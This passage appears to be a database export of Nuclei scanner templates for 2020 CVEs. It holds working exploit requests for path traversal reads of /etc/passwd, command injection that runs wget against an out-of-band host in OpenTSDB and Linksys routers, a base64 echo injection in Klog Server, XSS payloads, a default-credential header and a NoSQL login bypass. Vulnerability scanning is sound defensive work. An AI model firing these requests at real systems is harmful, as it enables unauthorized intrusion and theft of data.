http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3452\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-3452\n cwe-id: CWE-22,CWE-20\n epss-score: 0.97531\n epss-percentile: 0.99992\n cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: cisco\n product: adaptive_security_appliance_software\n tags: cve,cve2020,lfi,kev,packetstorm,cisco\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"\n - \"{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\"\n\n matchers:\n - type: word\n words:\n - \"INTERNAL_PASSWORD_ENABLED\"\n - \"CONF_VIRTUAL_KEYBOARD\"\n condition: and\n# digest: 4a0a004730450220083b1af8636250e0a465400427ebe39df44c1fd2fdafc0ab28ceac1ec21a2b6a022100ca085d560a8304af5d6162c1f37d3d62931dc1454d92c6003bff69c446ddc062:922c64590222798bb761d5b6d8e72950", "hash": "4823e8c192ed898a9ff4f2592de2cafb", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308207" }, "name": "CVE-2020-35234.yaml", "content": "id: CVE-2020-35234\n\ninfo:\n name: SMTP WP Plugin Directory Listing\n author: PR3R00T\n severity: high\n description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.\n impact: |\n Low: Information disclosure\n remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35234\n - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/\n - https://wordpress.org/plugins/easy-wp-smtp/#developers\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35234\n cwe-id: CWE-532\n epss-score: 0.37649\n epss-percentile: 0.97105\n cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: wp-ecommerce\n product: easy_wp_smtp\n framework: wordpress\n tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/easy-wp-smtp/\"\n - \"{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/\"\n\n matchers:\n - type: word\n words:\n - \"debug\"\n - \"log\"\n - \"Index of\"\n condition: and\n# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950", "hash": "ec416321d00b5bf0838b0792940a2e81", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308208" }, "name": "CVE-2020-35338.yaml", "content": "id: CVE-2020-35338\n\ninfo:\n name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection\n author: Jeya Seelan\n severity: critical\n description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the server.\n remediation: |\n Change the default credentials to strong and unique ones.\n reference:\n - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35338\n - https://www.mobileviewpoint.com/\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35338\n cwe-id: CWE-798\n epss-score: 0.29702\n epss-percentile: 0.96805\n cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mobileviewpoint\n product: wireless_multiplex_terminal_playout_server\n tags: cve,cve2020,wmt,default-login,mobileviewpoint\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/server/\"\n\n headers:\n Authorization: \"Basic OnBva29u\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"WMT Server playout\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d90bc7e3d71533f0575c136f4f13a6f7a419598ac09d57913c52d0239e3ac87d0221009ca68b1baddc88c46aaa979a70542106d8e7165c78038258ac7f35037066fee9:922c64590222798bb761d5b6d8e72950", "hash": "a665cb9f66081a4629fe7cd8114038a1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308209" }, "name": "CVE-2020-35476.yaml", "content": "id: CVE-2020-35476\n\ninfo:\n name: OpenTSDB <=2.4.0 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: |\n OpenTSDB 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade OpenTSDB to a version higher than 2.4.0 to mitigate this vulnerability.\n reference:\n - https://github.com/OpenTSDB/opentsdb/issues/2051\n - http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35476\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35476\n cwe-id: CWE-78\n epss-score: 0.95741\n epss-percentile: 0.99293\n cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: opentsdb\n product: opentsdb\n shodan-query: html:\"OpenTSDB\"\n tags: cve,cve2020,opentsdb,rce,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - plotted\n - timing\n - cachehit\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205a5db837668619514abd4b5a118f7e041c8f574a24b94397925bfe86afa7e3b90221009e04fec147cf698f9d10617130be06ffd77f3b4b3e7e1f035ec980127c66bded:922c64590222798bb761d5b6d8e72950", "hash": "3f268c4e75101bd6290bc0327415caab", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820a" }, "name": "CVE-2020-35489.yaml", "content": "id: CVE-2020-35489\n\ninfo:\n name: WordPress Contact Form 7 - Unrestricted File Upload\n author: soyelmago\n severity: critical\n description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to the target system and potential remote code execution.\n remediation: |\n Update to the latest version of the Contact Form 7 plugin to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35489\n - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/\n - https://wordpress.org/plugins/contact-form-7/#developers\n - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/\n - https://contactform7.com/2020/12/17/contact-form-7-532/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-35489\n cwe-id: CWE-434\n epss-score: 0.88428\n epss-percentile: 0.98435\n cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: rocklobster\n product: contact_form_7\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,rce,rocklobster\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '< 5.3.2')\n\n - type: word\n part: body\n words:\n - \"Contact Form 7\"\n - '== Changelog =='\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n internal: true\n\n - type: regex\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n# digest: 4a0a0047304502200119d40e914be20d2c6e92899c0f92c4d47e25598a6a62e070775ac3598541ac022100f55d4088bdcb51738c6039670f2b8f9a5196c7f7458c1f9094355d76e42655ad:922c64590222798bb761d5b6d8e72950", "hash": "cff979372ff068590db38c91824e17ee", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820b" }, "name": "CVE-2020-35580.yaml", "content": "id: CVE-2020-35580\n\ninfo:\n name: SearchBlox <9.2.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability.\n reference:\n - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html\n - https://developer.searchblox.com/docs/getting-started-with-searchblox\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35580\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35580\n cwe-id: CWE-22\n epss-score: 0.01833\n epss-percentile: 0.87972\n cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: searchblox\n product: searchblox\n tags: cve2020,cve,lfi,searchblox\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502201da11702e06331d8f8ff219e8bc69220f6171544ccfca6ecad9fef40ba169072022100fd26ae7a0963bb2a89e2e46906d37c053117091322cb077181667ab57e425b6d:922c64590222798bb761d5b6d8e72950", "hash": "fc568a85273b8ed9a942928228411564", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820c" }, "name": "CVE-2020-35598.yaml", "content": "id: CVE-2020-35598\n\ninfo:\n name: Advanced Comment System 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/49343\n - https://seclists.org/fulldisclosure/2020/Dec/13\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35598\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35598\n cwe-id: CWE-22\n epss-score: 0.11153\n epss-percentile: 0.9467\n cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: advanced_comment_system_project\n product: advanced_comment_system\n tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100911e463b70d73004e8ef94a9baaac09e041d404c58da64317ee96c7588297ba00220192e115eb0658148208f16c7326d2bc2148e422ac20569cd1d135b81008c25f4:922c64590222798bb761d5b6d8e72950", "hash": "663461cf563ae07856cfaec28031c780", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820d" }, "name": "CVE-2020-35713.yaml", "content": "id: CVE-2020-35713\n\ninfo:\n name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution\n author: gy741\n severity: critical\n description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Update the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later.\n reference:\n - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt\n - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35713\n - https://bugcrowd.com/disclosures/72d7246b-f77f-4f7f-9bd1-fdc35663cc92/linksys-re6500-unauthenticated-rce-working-across-multiple-fw-versions\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35713\n cwe-id: CWE-78\n epss-score: 0.96729\n epss-percentile: 0.9964\n cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: linksys\n product: re6500_firmware\n tags: cve,cve2020,linksys,rce,oast,router\n\nhttp:\n - raw:\n - |\n POST /goform/setSysAdm HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/login.shtml\n\n admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022075f0d76f377b911a20e32b13ad32f15eb5fb1e0fedbbe5b7660104f21d20d391022100f93eba91a2d924cd4d3530e6362549fdf26d23ebb303d135ddefc8da78e196a8:922c64590222798bb761d5b6d8e72950", "hash": "d9c6b14d812f1c7eb85b012362f16431", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820e" }, "name": "CVE-2020-35729.yaml", "content": "id: CVE-2020-35729\n\ninfo:\n name: Klog Server <=2.41 - Unauthenticated Command Injection\n author: dwisiswant0\n severity: critical\n description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.\n impact: |\n An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.\n remediation: |\n Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.\n reference:\n - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35729\n - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code\n - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md\n - https://github.com/Z0fhack/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35729\n cwe-id: CWE-78\n epss-score: 0.95566\n epss-percentile: 0.99266\n cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: klogserver\n product: klog_server\n tags: cve,cve2020,klog,rce,klogserver\nvariables:\n dummy: \"{{to_lower(rand_text_alpha(5))}}\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/actions/authenticate.php\"\n\n body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo \"cHJvamVjdGRpc2NvdmVyeS5pbw==\" | base64 -d & echo\"\n matchers:\n - type: word\n words:\n - \"poc-testing\" # from Base64 decoding payload\n# digest: 4b0a004830460221009a8413eb8da32ae540f0c5407408a59e973b61aee402b8f4ba704f472fec5d9a022100956d367efc9e53145c4b07d3bb2b8c5b0bde6f211a12b4e42160e5a4d9783ea2:922c64590222798bb761d5b6d8e72950", "hash": "fb09c1d217bddeca7b9e2eb1dda99522", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30820f" }, "name": "CVE-2020-35736.yaml", "content": "id: CVE-2020-35736\n\ninfo:\n name: GateOne 1.1 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: GateOne 1.1 allows arbitrary file retrieval without authentication via /downloads/.. local file inclusion because os.path.join is incorrectly used.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate the LFI vulnerability in GateOne 1.1.\n reference:\n - https://github.com/liftoff/GateOne/issues/747\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35736\n - https://rmb122.com/2019/08/28/Ogeek-Easy-Realworld-Challenge-1-2-Writeup/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-35736\n cwe-id: CWE-22\n epss-score: 0.01204\n epss-percentile: 0.83699\n cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: liftoffsoftware\n product: gateone\n tags: cve,cve2020,gateone,lfi,liftoffsoftware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100908e8f49353459e425b78f84c48a3efbe2ecad152c2a624e2e70b0eeb7d03276022100d679f9d150a3e04b488914d12e3cc57b7c1c89f983a0adc5e35f4dc5310b70ac:922c64590222798bb761d5b6d8e72950", "hash": "4a1a5834fa633eff249773eeec62771d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308210" }, "name": "CVE-2020-35749.yaml", "content": "id: CVE-2020-35749\n\ninfo:\n name: WordPress Simple Job Board <2.9.4 - Local File Inclusion\n author: cckuailong\n severity: high\n description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise.\n remediation: |\n Update to WordPress Simple Job Board version 2.9.4 or later to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35749\n - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing\n - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-35749\n cwe-id: CWE-22\n epss-score: 0.02144\n epss-percentile: 0.88116\n cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: presstigers\n product: simple_board_job\n framework: wordpress\n tags: cve,cve2020,authenticated,packetstorm,wp,lfi,wordpress,wp-plugin,wpscan,presstigers\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205aa1631c11bb3beabb3041432b1abbac3a39611e4086b7f525da85e83f48fc0002205cdd1e5fdfa1abe2fd05dd3722e4975de5913462464aaf925db798da8eac1374:922c64590222798bb761d5b6d8e72950", "hash": "8d2e46aee61ab6d37876e5086e0d4764", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308211" }, "name": "CVE-2020-35774.yaml", "content": "id: CVE-2020-35774\n\ninfo:\n name: twitter-server Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, data theft, or defacement.\n remediation: |\n Apply the latest security patches or updates provided by Twitter to mitigate the XSS vulnerability.\n reference:\n - https://advisory.checkmarx.net/advisory/CX-2020-4287\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35774\n - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c\n - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2020-35774\n cwe-id: CWE-79\n epss-score: 0.97225\n epss-percentile: 0.99823\n cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: twitter\n product: twitter-server\n tags: cve2020,cve,xss,twitter-server,twitter\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059aae75a1ba54ffd46128637519495af796f1bf598fe025a5dc99ae09ecfae6102202090450bd8a9fbf4c8c2099543cfa0f00fd5e78700e8995ad0f87ddf92e69c62:922c64590222798bb761d5b6d8e72950", "hash": "5b772a32b4b9c8cee3edc300064431c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308212" }, "name": "CVE-2020-3580.yaml", "content": "id: CVE-2020-3580\n\ninfo:\n name: Cisco ASA/FTD Software - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software are vulnerable to cross-site scripting and could allow an unauthenticated, remote attacker to conduct attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the reference links.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Cisco to mitigate this vulnerability.\n reference:\n - https://twitter.com/ptswarm/status/1408050644460650502\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n - https://nvd.nist.gov/vuln/detail/CVE-2020-3580\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-3580\n cwe-id: CWE-79\n epss-score: 0.97048\n epss-percentile: 0.99705\n cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cisco\n product: firepower_threat_defense\n tags: cve,cve2020,xss,cisco,kev\n\nhttp:\n - raw:\n - |\n POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a22843600fa540dd4035057b8812dca1cabaf0cb179c022be93bcd61aa640a6702200ad6f005a0c0b15427d37ec3fbbb81e0edea63010d20973f1d3760735d993b11:922c64590222798bb761d5b6d8e72950", "hash": "8ddd0f8ee10e8d217ea4b198a2c8d030", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308213" }, "name": "CVE-2020-35846.yaml", "content": "id: CVE-2020-35846\n\ninfo:\n name: Agentejo Cockpit < 0.11.2 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate the vulnerability.\n reference:\n - https://swarm.ptsecurity.com/rce-cockpit-cms/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-35846\n - https://getcockpit.com/\n - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466\n - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-35846\n cwe-id: CWE-89\n epss-score: 0.78767\n epss-percentile: 0.98182\n cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/check\"\n\n body: |\n {\n \"auth\": {\n \"user\": {\n \"$eq\": \"admin\"\n },\n \"password\": [\n 0\n ]\n }\n }\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"password_verify() expects parameter\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022054a4c1c91d4dc2db65ddab6c58e5ce6ed8009e20d03a321ac03742dfdab22439022100917d48526b787d17f67533ad55a2b0e0d3264e2eb38c019d56255c6a244c707c:922c64590222798bb761d5b6d8e72950", "hash": "09697a34f75d3a22113d2f6d5094e609", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308214" }, "name": "CVE-2020-35847.yaml", "content": "id: CVE-2020-35847\n\ninfo:\n name: Agentejo Cockpit <0.11.2 - NoSQL Injection\n author: dwisiswant0\n severity: critical\n description: |\n Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.\n impact: |\n Successful exploitation of this 